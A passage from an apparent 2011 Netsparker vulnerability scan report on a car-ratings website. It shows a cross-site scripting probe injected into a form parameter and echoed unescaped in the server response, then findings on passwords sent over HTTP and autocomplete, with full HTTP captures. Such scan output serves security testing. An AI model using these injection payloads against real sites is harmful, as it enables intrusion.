Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FE7)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000FE7)</script>" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /client_dao_login.php

/client_dao_login.php CONFIRMED

http://www.strategicvision.com/client_dao_login.php

Form target action

client_dao_authenticate.php

Request

GET /client_dao_login.php HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO Login</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO Login</div> <div class="pagetext"> <div class="pagesubtitle">Please enter in your DAO User ID and password:</div> <p class="pagetext"> <form action="client_dao_authenticate.php" method="post" name="daoLoginForm" onSubmit="return validateLoginForm(this);"> <table border="0" cellpadding="5" cellspacing="0" class="text"> <tr> <td width="61" class="boldtext">User ID:</td> <td width="289"><input type="text" name="userID" size="20" maxlength="200" onBlur="trimField(this);" /> (use &quot;strategic&quot;)</td> </tr> <tr> <td class="boldtext">Password:</td> <td><input type="password" name="password" size="20" maxlength="100" onBlur="trimField(this);" /> (use &quot;vision&quot;)</td> </tr> <tr> <td colspan="2"><input type="submit" name="submitButton" value="Login" /></td> </tr> </table> </form> </p> </div> <!-- End the page --> </td> <!-- optional third column -- > <td width="150" bgcolor="#EEEEEE"> optional page </td> <!-- end optional third column --> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /client_dao_login.php

/client_dao_login.php CONFIRMED

http://www.strategicvision.com/client_dao_login.php

Identified Field Name

password

Request

GET /client_dao_login.php HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO Login</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO Login</div> <div class="pagetext"> <div class="pagesubtitle">Please enter in your DAO User ID and password:</div> <p class="pagetext"> <form action="client_dao_authenticate.php" method="post" name="daoLoginForm" onSubmit="return validateLoginForm(this);"> <table border="0" cellpadding="5" cellspacing="0" class="text"> <tr> <td width="61" class="boldtext">User ID:</td> <td width="289"><input type="text" name="userID" size="20" maxlength="200" onBlur="trimField(this);" /> (use &quot;strategic&quot;)</td> </tr> <tr> <td class="boldtext">Password:</td> <td><input type="password" name="password" size="20" maxlength="100" onBlur="trimField(this);" /> (use &quot;vision&quot;)</td> </tr> <tr> <td colspan="2"><input type="submit" name="submitButton" value="Login" /></td> </tr> </table> </form> </p> </div> <!-- End the page --> </td> <!-- optional third column -- > <td width="150" bgcolor="#EEEEEE"> optional page </td> <!-- end optional third 